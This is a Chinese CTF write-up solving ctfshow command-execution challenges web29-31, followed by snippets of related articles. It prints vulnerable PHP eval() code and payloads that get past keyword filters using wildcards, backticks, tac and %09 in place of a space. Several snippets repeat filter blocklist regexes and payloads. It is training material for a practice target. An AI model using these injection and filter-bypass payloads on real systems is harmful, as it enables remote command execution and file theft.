ctfshow WEB入門命令執行 web29-web122

阿新 • • 發佈：2021-07-10

web29

題目原始碼:

if(isset($_GET['c'])){   
$c = $_GET['c'];   
    if(!preg_match("/flag/i", $c)){      
        eval($c);   
    }   
}   
else{  
    highlight_file(__FILE__);   
}

利用函式：eval()

繞過思路：萬用字元繞過flag過濾

Payload1:`/?c=system(“ls”);` #找到flag.php

Payload2:`/?c=system(“cat fla*”);`

web30

題目原始碼

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

利用函式：eval()

繞過思路：過濾了system，這裡使用echo。flag,php過濾繼續用萬用字元繞過。

Payload1:?c=echo `cat *` ;

web31

題目原始碼

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

利用函式：eval()

繞過思路：過濾了system，這裡使用echo。flag,php過濾繼續用萬用字元繞過。空格用%09繞過，cat被過濾了換成tac。

Payload1:?c=echo `tac%09*`;

ctfshow WEB入門命令執行 web29-web122

web29 題目原始碼: if(isset($_GET[\'c\'])){ $c = $_GET[\'c\']; if(!preg_match(\"/flag/i\", $c)){ eval($c);

CTFShow-Web入門-命令執行 29-36

web29 error_reporting(0); if(isset($_GET[\'c\'])){ $c = $_GET[\'c\']; if(!preg_match(\"/flag/i\", $c)){ eval($c);

CTFShow-Web入門-命令執行 37-49

data:// 用法：data://text/plain;base64, web37 error_reporting(0); if(isset($_GET[\'c\'])){ $c = $_GET[\'c\'];

CTFShow-Web入門-命令執行 71-74

web71 payload：c=include(\"/flag.txt\");exit(); 執行完前面的包含語句後會強制退出，不會執行後面的語句

ctfshow web入門 - 命令執行（50）

if(isset($_GET[\'c\'])){ $c=$_GET[\'c\']; if(!preg_match(\"/\\;|cat|flag| |[0-9]|\\\\$|\\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\\`|\\%|\\x09|\\x26/i\", $c)){

ctfshow-web入門命令執行-web40/web41(附python指令碼)

web40 別看這裡過濾了這麼多，其實他過濾的括號是中文括號，這裡我開始納悶了好久

ctfshow web入門命令執行

web32 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date:2020-09-04 00:12:34 # @Last Modified by:h1xa

ctf show--web 入門命令執行篇部分題解

技術標籤：ctf 最近和朋友一起入了ctf show的坑，在這裡記錄一下刷題過程以及從大佬那裡學到的姿勢。

ctf_show-web入門-命令執行(29-39)

WEB29 正則表示式過濾了flag 首先先看看有什麼檔案，?c=system(ls); 看到了 flag.php 用*來輸出,?c=system(\'cat fla*\');

ctf_show-web入門-命令執行(42-53)

WEB42 >是寫入而1和2意思百度一下：那麼就是不管標準輸出還是錯誤輸出都輸入到null裡銷燬

ctf_show-web入門-命令執行(118-124)

web-118 測試了一下發現數字和字母過濾了，第一反應是無符號rce，發現走不通。

ctfshow Web入門 40 - 命令執行（10）

題目過濾如下：先檢視當前目錄下面有啥檔案參考了羽大佬的WP：https://blog.csdn.net/miuzzx/article/details/108415301

CTFshow web入門 (php特性）

web 89 <?php include(\"flag.php\"); highlight_file(__FILE__); if(isset($_GET[\'num\'])){ $num = $_GET[\'num\'];

Ctfshow Web入門 - 檔案包含總結

1.普通檔案包含常見的php偽協議大致四種 1.php://filter主要用於讀取原始碼 2.php://input經常使用file_get_contents獲取php://input內容

Ctfshow Web入門 - PHP特性（待續）

Web89 include(\"flag.php\"); highlight_file(__FILE__); if(isset($_GET[\'num\'])){ $num = $_GET[\'num\']; if(preg_match(\"/[0-9]/\", $num)){

ctfshow web入門 web57

膜看wp分析一波只要湊出36即可 0x01 shell中各種括號()、(())、[]、[[]]、{}的作用和區別 : https://blog.csdn.net/qq_46091464/article/details/108563368

ctfshow web入門反序列化

技術標籤：CTFwebphp 文章目錄 web254web255web256web257web258web259web260 web254 <?php error_reporting(0);

CTFshow-WEB入門-反序列化(持續更新)

技術標籤：序列化和反序列化PHP反序列化web安全前言簡單的反序列化直接給出payload，有意思的，較為複雜的和我不太會的會分析一波。

CTFSHOW WEB入門 PHP特性篇

web89 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date:2020-09-16 11:25:09 # @Last Modified by:h1xa

ctfshow web入門資訊收集

資訊收集 web1 檢視原始碼： 1.右鍵，檢視原始碼 2.view-source：url web2 view-source：url檢視原始碼